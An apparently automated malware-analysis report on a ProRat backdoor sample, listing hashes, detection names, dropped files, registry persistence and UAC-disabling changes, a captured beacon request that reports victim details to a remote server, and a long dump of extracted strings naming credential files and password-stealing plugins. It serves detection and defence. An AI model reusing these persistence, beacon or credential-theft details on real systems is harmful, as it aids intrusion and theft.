AIT.Trojan.Autoit.CLU_8b7e04784b

by malwarelabrobot on February 8th, 2018 in Malware Descriptions.

AIT:Trojan.Autoit.CLU (BitDefender), Backdoor:Win32/Prorat.AC (Microsoft), HEUR:Trojan.Win32.Generic (Kaspersky), Trojan.Win32.Generic!BT (VIPRE), BackDoor.ProRat (DrWeb), AIT:Trojan.Autoit.CLU (B) (Emsisoft), Artemis!8B7E04784B7B (McAfee), Trojan.Gen.2 (Symantec), AIT:Trojan.Autoit.CLU (FSecure), Win32:GenMalicious-AGV [Trj] (AVG), Win32:GenMalicious-AGV [Trj] (Avast), TROJ_GEN.R03BC0WKJ17 (TrendMicro), AIT:Trojan.Autoit.CLU (AdAware), Trojan.Win32.Bumat.FD, VirusParite.YR (Lavasoft MAS)
Behaviour: Trojan, Backdoor, Virus


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.


MD5: 8b7e04784b7ba4b6955c3ad1e476510a
SHA1: e38d880f612499dc396f296d63a783baf3f2f6f0
SHA256: 6b562d027c1c51fee98c241f7230b16c5f2dd8daba162a5e1bcf53bda273e7b7
SSDeep: 24576:/4lavt0LkLL9IMixoEgeaK4bBHdsFA5/vN/kIwT7q9MmCS:6kwkn9IMHeaKwaiN/kZaPCS
Size: 1550848 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2017-11-18 18:28:15
Analyzed on: Windows7 SP1 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The AIT creates the following process(es):

fservice.exe:1476
5141.exe:288
%original file name%.exe:3624

The AIT injects its code into the following process(es):

services.exe:1276
Explorer.EXE:2024
conhost.exe:3700

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process fservice.exe:1476 makes changes in the file system.
The AIT creates and/or writes to the following file(s):

C:\Windows\services.exe (2457 bytes)
C:\Windows\system\sservice.exe (2105 bytes)

The AIT deletes the following file(s):

C:\Windows\System32\fservice.exe (0 bytes)
C:\Windows\system\sservice.exe (0 bytes)

The process 5141.exe:288 makes changes in the file system.
The AIT creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\5141\5141.exe.bat (135 bytes)
C:\Windows\System32\fservice.exe (2457 bytes)
C:\Windows\system\sservice.exe (2105 bytes)

The process %original file name%.exe:3624 makes changes in the file system.
The AIT creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\jbvpkqi (10089 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\autA852.tmp (5393 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\5141\5141.exe (703 bytes)

The AIT deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\5141\5141.exe (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\jbvpkqi (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\autA852.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\5141 (0 bytes)

Registry activity

The process 5141.exe:288 makes changes in the system registry.
The AIT creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run]
"DirectX For Microsoft® Windows" = "C:\Windows\system32\fservice.exe"

[HKCU\Software\Microsoft\Windows NT Script Host\Microsoft DxDiag\WinSettings]
"ICQ_UIN" = "xnt/on,hq/bnl"
"LanNotifie" = ""

[HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\{5Y99AE78-58TT-11dW-BE53-Y67078979Y}]
"StubPath" = "C:\Windows\system\sservice.exe"

[HKCU\Software\Microsoft\Windows NT Script Host\Microsoft DxDiag\WinSettings]
"Bulas" = "1"
"Kurban_Ismi" = "whbuhl"
"XP_FW_Disable" = "1"
"XP_SYS_Recovery" = "1"
"Hata" = ""
"Port" = "4001"
"Sifre" = "032547"
"Mail" = "cnlcdsl`oAx`inn/bnl"
"ICQ_UIN2" = "046007686"
"FW_KILL" = "1"

"Online_List" = "iuuq;..vvv/xntsrhud/bnl.bfh,cho.qsns`u/bfh"
"KSil" = "1"

The AIT adds the reference to itself to be executed when a user logs on:

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Shell" = "Explorer.exe C:\Windows\system32\fservice.exe"

The process %original file name%.exe:3624 makes changes in the system registry.
The AIT creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system]
"EnableLUA" = "0"
"ConsentPromptBehaviorAdmin" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

The AIT deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

Dropped PE files

MD5 File path
6796067f8731bcfe771c3023adc9143d c:\Windows\System32\fservice.exe
904f3b552d0b762edb4520163d12d3cf c:\Windows\System32\reginv.dll
d910659cca6a1650c10ff263c8a10fe7 c:\Windows\System32\winkey.dll
6796067f8731bcfe771c3023adc9143d c:\Windows\services.exe
6796067f8731bcfe771c3023adc9143d c:\Windows\system\sservice.exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

Company Name:
Product Name:
Product Version:
Legal Copyright:
Legal Trademarks:
Original Filename:
Internal Name:
File Version:
File Description:
Comments:
Language: English (United States)

PE Sections

Name    Virtual Address  Virtual Size  Raw Size  Entropy  Section MD5
.text   4096             573044        573440    4.63126  74af66fa540568c59b3868e78900e476
.rdata  577536           182122        182272    4.0072   576c856afaad699ad9fe099fc6a9ce33
.data   761856           40756         25088     1.38934  e6d2e204147f7cdc3055011093632f54
.rsrc   802816           726352        726528    5.43142  63ee5075589e1a5967fb64e2b42441b5
.reloc  1531904          42082         42496     3.63105  c2f6ddaeef894b7510c3be928eeae5dd

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://www.yoursite.com/cgi-bin/prorat.cgi?bilgisayaradi=WIN_UK_FFOO__I_&ipadresi=192.168.11.133&serverportu=5110&kurban=victim&servermodeli=V1.9-Test-Version-8&serversaati=11:35:39_PM&servertarihi=2/7/2018&serversifre=123456&islem=log 54.221.207.100
mta6.am0.yahoodns.net 67.195.229.59
www.icq.com 178.237.20.20
you.no-ip.com


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

Traffic

GET hXXp://VVV.yoursite.com/cgi-bin/prorat.cgi?bilgisayaradi=WIN_UK_FFOO__I_&ipadresi=192.168.11.133&serverportu=5110&kurban=victim&servermodeli=V1.9-Test-Version-8&serversaati=11:35:39_PM&servertarihi=2/7/2018&serversifre=123456&islem=log HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Host: VVV.yoursite.com
Connection: Keep-Alive


HTTP/1.1 302 Found
Date: Wed, 07 Feb 2018 21:35:41 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
Location: hXXp://VVV.hostingdomains.com
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


The AIT connects to the servers at the following location(s):

services.exe_1276:

.rsrc
Portl
LocalPortl
PeerPortl
SocksPortl
SocksPassword`
wsock32.dll
Unable to load wsock32.dll Error #
%s: WSAStartup error #%d
0.0.0.0
Cannot change Port if not closed
Cannot change LocalPort if not closed
255.255.255.255
WSocketResolveHost: Cannot convert host address '%s', Error #%d
WSocketResolvePort: Invalid Port.
WSocketResolvePort: Cannot convert port '%s', Error #%d
WSocketResolveProto: Cannot convert protocol '%s', Error #%d
GetPeerPort
%s: can't start DNS lookup, error #%d
winsock.bind failed, error #%d
winsock.getsockname failed, error #%d
Connect: No Port Specified
listen: port not assigned
Winsock.GetHostName failed
Operation would block
Operation now in progress
Operation already in progress
Socket operation on non-socket
Protocol not supported
Socket type not supported
Operation not supported on socket
Protocol family not supported
Address family not supported by protocol family
WinSock DLL cannot support this application
Can't change socks port if not closed
Listening is not supported thru socks server
tcp is the only protocol supported thru socks server
0.0.0.1
command not supported
address type not supported
TFtpString
TFtpServer (c) 1998-2000 F. Piette V1.08
FtpServerException
FtpServerException\
FtpSrv
TFtpSrvAuthenticateEvent
TFtpCtrlSocket
Password
TFtpSrvChangeDirectoryEvent
TFtpSrvBuildDirectoryEvent
TFtpSrvClientConnectEvent
TFtpSrvDataSessionConnectedEvent
TFtpSrvClientCommandEvent
Keyword
TFtpSrvAnswerToClientEvent
TFtpSrvValidateXferEvent
TFtpSrvDataAvailableEvent
TFtpSrvRetrDataSentEvent
TFtpSrvCommandProc
TFtpSrvCommandTableItem
TFtpServer
220 ICS FTP Server ready.
PORT
500 '%s': command not understood.
331 Password required for %s.
503 Login with USER first.
230 User %s logged in.
530 Login incorrect.
$530 Please login with USER and PASS.
250 CWD command successful. "%s" is current directory.
501 CWD failed. %s
257 "%s" is current directory.
200 Port command successful.
501 Invalid PORT command.
150 Opening data connection for %s.
501 Cannot STOR. %s
ftp-data
426 Connection closed; %s.
426 Connection closed; transfer aborted. Error #%d
501 Cannot RETR. %s
451 Failed: %s.
1 ftp ftp
%s %2.2d
200 Type set to %s.
500 'TYPE %s': command not understood.
250 File '%s' deleted.
450 File '%s' can't be deleted.
550 '%s': no such file or directory.
213 %d
550 Command failed: %s.
350 REST supported. Ready to resume at byte offset %d.
501 Syntax error in parameter: %s.
553 '%s': file already exists.
250 File '%s' renamed to '%s'.
450 File '%s' can't be renamed.
200 Ok. Parameter was '%s'.
550 '%s': can't create directory.
550 '%s': file or directory already exists.
257 '%s': directory created.
150 APPE supported. Ready to append file "%s" at offset %d.
200 Ok. STRU parameter '%s' ignored.
550 '%s': no such directory.
250 '%s': directory removed.
550 '%s': can't remove directory.
227 Entering Passive Mode (127,0,0,1,%d,%d).
227 Entering Passive Mode (%d,%d,%d,%d,%d,%d).
500 PASV exception: '%s'.
213 %s
550 %s
SMTP component (c) 1997-2000 F. Piette V2.17
SmtpException
SmtpExceptionD
SmtpProt
TSmtpState
smtpReady
smtpDnsLookup
smtpConnecting
smtpConnected
smtpInternalReady
smtpWaitingBanner
smtpWaitingResponse
smtpAbort
TSmtpRequest
smtpConnect
smtpHelo
smtpMailFrom
smtpVrfy
smtpRcptTo
smtpData
smtpQuit
smtpRset
smtpOpen
smtpMail
smtpCustom
TSmtpFct
smtpFctNone
smtpFctHelo
smtpFctConnect
smtpFctMailFrom
smtpFctRcptTo
smtpFctData
smtpFctVrfy
smtpFctQuit
smtpFctRset4
TSmtpFctSet
TSmtpContentType
smtpHTML
smtpPlainText
TSmtpDisplay
TSmtpHeaderLineEvent
TSmtpProcessHeaderEvent
TSmtpGetDataEvent
MsgLine
TSmtpRequestDone
TSmtpAttachmentContentType
TSmtpAttachHeader
TSmtpNextProc
TCustomSmtpClient`
TCustomSmtpClient(
TSmtpCli
OnProcessHeader
TSyncSmtpCli
TSyncSmtpCliT
smtp
SMTP component not ready
Uhh%D
SMTP component not connected
SMTP component already connected
426 Operation aborted.
FtpSrvT (c) 1999-2000 F. Piette V1.02
TFtpCtrlSocket (c) 1998-2000 F. Piette V1.06
EFtpCtrlSocketException
FtpSrvC
TFtpCtrlState
ftpcInvalid
ftpcWaitingUserCode
ftpcWaitingPassword
ftpcReady
ftpcWaitingAnswert_D
TFtpCmdType
ftpcPORT
ftpcSTOR
ftpcRETR
ftpcCWD
ftpcXPWD
ftpcPWD
ftpcUSER
ftpcPASS
ftpcLIST
ftpcRMD
ftpcTYPE
ftpcSYST
ftpcQUIT
ftpcDELE
ftpcRNFR
ftpcMKD
ftpcRNTO
ftpcNOOP
ftpcNLST
ftpcABOR
ftpcCDUP
ftpcSIZE
ftpcREST
ftpcAPPE
ftpcSTRU
ftpcMDTMx`D
TFtpOption
ftpcUNC
TFtpOptions
CmdBuf
CmdLen
TFtpCtrlSocketxaD
FtpStatel
PassWord
220-ICS FTP Server ready
ssHorizontal
OnKeyDown
OnKeyPress@
OnKeyUp
windows
AutoHotkeys
:].tJ
EInvalidGraphicOperation
UhY%F
KeyPreviewx8E
WindowState
ssHotTrack
TWindowState
poProportional
TWMKey
Uh.oF
System\CurrentControlSet\Control\Keyboard Layouts\%.8x
vcltest3.dll
TDragOperation
TKeyEvent
TKeyPressEvent
crSQLWait
Uh.EG
%s (%s)
IMM32.DLL
EInvalidOperation
%s[%d]
%s_%d
USER32.DLL
comctl32.dll
MSWHEEL_ROLLMSG
MSH_WHEELSUPPORT_MSG
MSH_SCROLL_LINES_MSG
kernel32.dll
Portions Copyright (c) 1983,99 Borland
%u8F3
iphlpapi.dll
user32.dll
The procedure entry point %s could not be located in the dynamic link library %s
The ordinal %u could not be located in the dynamic link library %s
advapi32.dll
shell32.dll
.text
.rdata
.data
.reloc
.aspack
.adata
MFC42.DLL
MSVCRT.dll
GetWindowsDirectoryA
KERNEL32.dll
GetKeyboardState
SetWindowsHookExA
UnhookWindowsHookEx
USER32.dll
dW%xSJ"
mfc42.dll
msvcrt.dll
.HookSec
B[ProRat v1.9 Trojan Horse - Coded by PRO Group - Made in Turkey]
RegEnumKeyW
Advapi32.dll
NTDLL.DLL
Windows services
{5Y99AE78-58TT-11dW-BE53-Y67078979Y}
GetCPInfo
TESTDLL.dll
4 4$4(4,4044484
6 6$6(6,6
CRTZFUKL,GZG
LTCPAJ34,GZG
151.164.23.201
151.164.1.8
212.101.97.7
ege.edu.tr
ankara.edu.tr
192.168.0.1
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_CURRENT_CONFIG
cuteftp
Login :
Password :
Pass :
SOFTWARE\Microsoft\Windows\CurrentVersion
%Program Files%
\GlobalSCAPE\CuteFTP\sm.dat
\GlobalSCAPE\CuteFTP\smdata.dat
\CuteFTP\tree.dat
\CuteFTP\smdata.dat
\GlobalSCAPE\CuteFTP Pro\sm.dat
\GlobalSCAPE\CuteFTP\5.0\sm.dat
\GlobalSCAPE\CuteFTP Pro\2.0\sm.dat
\GlobalSCAPE\CuteFTP Pro\3.0\sm.dat
\GlobalSCAPE\CuteFTP Pro\6.0\sm.dat
\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ratings
\RSACi.rat
\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ratings\.Default
\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ratings\.Default\hXXp://VVV.rsac.org/ratingsv01.html
\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ratings\PICSRules
\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ratings\PICSRules\.Default
\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ratings\PICSRules\.Default\0
\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ratings\PICSRules\.Default\0\PRPolicy
\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ratings\PICSRules\.Default\0\PRPolicy\
PRNumURLExpressions
PRBUPort
PRBUUrl
Sites.dat
Password :
Port :
Port
Tport_atm=0
\reg_ent.reg
regedit.exe /s
\winrar.exe
Microsoft Windows NT
Microsoft Windows 2000
Microsoft Windows XP
Microsoft Windows 95
Microsoft Windows 98
Microsoft Windows Me
\Software\Microsoft\Windows NT Script Host\Microsoft DxDiag\WinSettings\
d_.exe
winoa386.mod
\scrpt.bat
\scrpt.vbs
\winkey.dll
\reginv.dll
127.0.0.1
.jpeg
\win.ini
\system.ini
Explorer.exe
del %c%s%c
if exist %c%s%c goto 1
del À
\system32\fservice.exe
\system\sservice.exe
\mps.atm
\kdd32.atm
\system32\winkey.dll
\system\winkey.dll
\system32\wininv.dll
\system\wininv.dll
SOFTWARE\Microsoft\Active Setup\Installed Components\{5Y99AE78-58TT-11dW-BE53-Y67078979Y}
SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run\
Windows
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\
Explorer.exe
SOFTWARE\Microsoft\Windows NT Script Host\Microsoft DxDiag
GET /friendship/email_thank_you.php?folder_id=17961¶ms_count=0&nick_name=ProRat Server&user_email=
@yahoo.com&user_uin=&friend_nickname=&friend_contact=
&friend_nickname2=&friend_contact2=&x=36&y=10 HTTP/1.1
Referer: hXXp://VVV.icq.com/friendship/pages/send_by_email_17961.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Host: VVV.icq.com
Software\Microsoft\Windows\CurrentVersion\Policies\System
c:\autoexec.bat
\p_ekran.jpg
services.exe
msn.ini
yahoo.ini
Windows Ver :
Windows Language :
Windows Path :
software\microsoft\windows\currentversion
VVV.icq.com
Port :
Password :
Microsoft Outlook Express 6.00.2800.1158
\p_ekran.bmp
SOFTWARE\Microsoft\Windows NT Script Host\Microsoft DxDiag\WinSettings
Tport
Pplugin1.dll
Pplugin2.dll
Pplugin3.dll
Pplugin4.exe
Pplugin4.dat
Pplugin4.exe /stext
ktd32.atm
Pplugin8.exe
PpluginCd.dll
Pplugin9.dat
Pplugin8.exe /stext
Pplugin10xa.exe
Pplugin10xa.exe /stext
winp9.exe
winp9.exe /stext
eimsn.exe
winrar.exe
Software\Microsoft\Active Setup\Installed Components\{5Y99AE78-58TT-11dW-BE53-Y67078979Y}
\services.exe
Windows services
Online_List_atm=iuuq;..vvv/xntsrhud/bnl.bfh,cho.qsns`u/bfh
Port_atm=4001
SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run
SOFTWARE\Microsoft\Active Setup\Installed Components\{5Y99AE78-58TT-11dW-BE53-Y67078979Y}\
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
shutdown.exe -s -t 00
shutdown.exe -r -t 00
shutdown.exe -l
\refresh.scf
CONTROL.EXE desk.cpl
CONTROL.EXE hdwwiz.cpl
CONTROL.EXE inetcpl.cpl
CONTROL.EXE appwiz.cpl
CONTROL.EXE intl.cpl
CONTROL.EXE joy.cpl
CONTROL.EXE access.cpl
CONTROL.EXE main.cpl
CONTROL.EXE ncpa.cpl
CONTROL.EXE nusrmgr.cpl
CONTROL.EXE timedate.cpl
CONTROL.EXE mmsys.cpl
CONTROL.EXE powercfg.cpl
CONTROL.EXE sysdm.cpl
CONTROL.EXE telephon.cpl
CONTROL.EXE odbccp32.cpl
\SOFTWARE\Microsoft\Internet Explorer\TypedURLs
////////// URL HISTORY //////////
url10
url11
url12
url13
url14
url15
url16
url17
url18
url19
url20
url21
url22
url23
url24
url25
00010pPassword Decrypt Error!
SMTP
\ICQ\Icq.exe
\Messenger\msmsgs.exe
\MSN Messenger\msnmsgr.exe
\Yahoo!\Messenger\YPager.exe
\Outlook Express\msimn.exe
\GlobalSCAPE\CuteFTP\cutftp32.exe
\NetMeeting\conf.exe
notepad.exe
mspaint.exe
wordpad.exe
calc.exe
\WinZip\WINZIP32.EXE
\WinRAR\WinRAR.exe
cmd.exe
command.com
\Internet Explorer\IEXPLORE.EXE
wmplayer.exe
\Winamp\winamp.exe
\Real\RealOne Player\realplay.exe
\QuickTime\QuickTimePlayer.exe
\Movie Maker\moviemk.exe
\FlashGet\flashget.exe
_ReadCdKeys
&serverportu=
HTTP/1.1
ProRat@Yahoo.Com
<ProRat@Yahoo.Com>
FtpServer1
FtpServer2
SmtpCli1
FtpServer1Authenticate
FtpServer2Authenticate
FormKeyDown
SmtpCli1RequestDone
FtpServer1ChangeDirectory
Memo2KeyDown
xxtype.cpp
derv->tpClass.tpcFlags & CF_HAS_BASES
Inappropriate I/O control operation
Broken pipe
Operation not permitted
%H:%M:%S
%m/%d/%y
%A, %B %d, %Y
d/d/d d:d:d.d
xx.cpp
varType->tpClass.tpcFlags & CF_HAS_DTOR
varType->tpClass.tpcDtorAddr
(errPtr->ERRcInitDtc >= varType->tpClass.tpcDtorCount) || flags
memType->tpClass.tpcFlags & CF_HAS_DTOR
varType->tpArr.tpaElemType->tpClass.tpcFlags & CF_HAS_DTOR
dttPtr->dttType->tpPtr.tppBaseType->tpClass.tpcFlags & CF_HAS_DTOR
IS_CLASS(dttPtr->dttType->tpMask) && (dttPtr->dttType->tpClass.tpcFlags & CF_HAS_DTOR)
elemType->tpClass.tpcFlags & CF_HAS_DTOR
C:\Windows\
Cv=kAv.SCv
Dv}.Bv
Project1.exe
@$xp$16Ftpsrv@FtpSrv__3
@$xp$17Ftpsrv@TFtpServer
@$xp$17Ftpsrv@TFtpString
@$xp$17Smtpprot@TSmtpCli
@$xp$17Smtpprot@TSmtpFct
@$xp$18Ftpsrvc@TFtpOption
@$xp$19Ftpsrvc@TFtpCmdType
@$xp$19Ftpsrvc@TFtpOptions
@$xp$19Smtpprot@TSmtpState
@$xp$20Smtpprot@TSmtpFctSet
@$xp$21Ftpsrvc@TCommandEvent
@$xp$21Ftpsrvc@TDisplayEvent
@$xp$21Ftpsrvc@TFtpCtrlState
@$xp$21Smtpprot@TSmtpDisplay
@$xp$21Smtpprot@TSmtpRequest
@$xp$21Smtpprot@TSyncSmtpCli
@$xp$22Ftpsrvc@TFtpCtrlSocket
@$xp$22Smtpprot@SmtpException
@$xp$22Smtpprot@TSmtpNextProc
@$xp$25Ftpsrv@FtpServerException
@$xp$25Ftpsrv@TFtpSrvCommandProc
@$xp$25Smtpprot@TSmtpContentType
@$xp$25Smtpprot@TSmtpRequestDone
@$xp$26Ftpsrv@TFtpCtrlSocketClass
@$xp$26Smtpprot@TCustomSmtpClient
@$xp$26Smtpprot@TSmtpAttachHeader
@$xp$26Smtpprot@TSmtpGetDataEvent
@$xp$29Smtpprot@TSmtpHeaderLineEvent
@$xp$30Ftpsrv@TFtpSrvCommandTableItem
@$xp$31Ftpsrv@TFtpSrvAuthenticateEvent
@$xp$31Ftpsrv@TFtpSrvRetrDataSentEvent
@$xp$31Ftpsrv@TFtpSrvValidateXferEvent
@$xp$31Ftpsrvc@EFtpCtrlSocketException
@$xp$32Ftpsrv@TFtpSrvClientCommandEvent
@$xp$32Ftpsrv@TFtpSrvClientConnectEvent
@$xp$32Ftpsrv@TFtpSrvDataAvailableEvent
@$xp$32Smtpprot@TSmtpProcessHeaderEvent
@$xp$33Ftpsrv@TFtpSrvAnswerToClientEvent
@$xp$33Ftpsrv@TFtpSrvBuildDirectoryEvent
@$xp$34Ftpsrv@TFtpSrvChangeDirectoryEvent
@$xp$35Smtpprot@TSmtpAttachmentContentType
@$xp$39Ftpsrv@TFtpSrvDataSessionConnectedEvent
@Ftpsrv@CopyRight
@Ftpsrv@Finalization$qqrv
@Ftpsrv@FtpServerException@
@Ftpsrv@Register$qqrv
@Ftpsrv@TFtpServer@
@Ftpsrv@TFtpServer@$bctr$qqrp18Classes@TComponent
@Ftpsrv@TFtpServer@$bdtr$qqrv
@Ftpsrv@TFtpServer@AddCommand$qqrx17System@AnsiStringxynpqqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2$v
@Ftpsrv@TFtpServer@BuildDirectory$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%p15Classes@TStreamo
@Ftpsrv@TFtpServer@ClientCommand$qqrp14System@TObjectpci
@Ftpsrv@TFtpServer@ClientDataSent$qqrp14System@TObjectus
@Ftpsrv@TFtpServer@ClientPassiveSessionAvailable$qqrp14System@TObjectus
@Ftpsrv@TFtpServer@ClientRetrDataSent$qqrp14System@TObjectus
@Ftpsrv@TFtpServer@ClientRetrSessionClosed$qqrp14System@TObjectus
@Ftpsrv@TFtpServer@ClientRetrSessionConnected$qqrp14System@TObjectus
@Ftpsrv@TFtpServer@ClientSessionClosed$qqrp14System@TObjectus
@Ftpsrv@TFtpServer@ClientStorDataAvailable$qqrp14System@TObjectus
@Ftpsrv@TFtpServer@ClientStorSessionClosed$qqrp14System@TObjectus
@Ftpsrv@TFtpServer@ClientStorSessionConnected$qqrp14System@TObjectus
@Ftpsrv@TFtpServer@CommandABOR$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandAPPE$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandCDUP$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandCWD$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandChangeDir$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandDELE$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandDirectory$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2o
@Ftpsrv@TFtpServer@CommandLIST$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandMDTM$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandMKD$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandNLST$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandNOOP$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandPASS$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandPASV$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandPORT$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandPWD$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandQUIT$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandREST$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandRETR$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandRMD$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandRNFR$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandRNTO$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandSIZE$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandSTOR$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandSTRU$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandSYST$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandTYPE$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandUSER$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandXPWD$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@DisconnectAll$qqrv
@Ftpsrv@TFtpServer@GetActive$qqrv
@Ftpsrv@TFtpServer@GetClientCount$qqrv
@Ftpsrv@TFtpServer@Notification$qqrp18Classes@TComponent18Classes@TOperation
@Ftpsrv@TFtpServer@SendAnswer$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%
@Ftpsrv@TFtpServer@SendNextDataChunk$qqrp22Ftpsrvc@TFtpCtrlSocketp16Wsocket@TWSocket
@Ftpsrv@TFtpServer@ServSocketSessionAvailable$qqrp14System@TObjectus
@Ftpsrv@TFtpServer@ServSocketStateChange$qqrp14System@TObject20Wsocket@TSocketStatet2
@Ftpsrv@TFtpServer@SetActive$qqro
@Ftpsrv@TFtpServer@Start$qqrv
@Ftpsrv@TFtpServer@StartSendData$qqrp22Ftpsrvc@TFtpCtrlSocket
@Ftpsrv@TFtpServer@Stop$qqrv
@Ftpsrv@TFtpServer@TriggerAlterDirectory$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%o
@Ftpsrv@TFtpServer@TriggerAuthenticate$qqrp22Ftpsrvc@TFtpCtrlSocket17System@AnsiStringt2ro
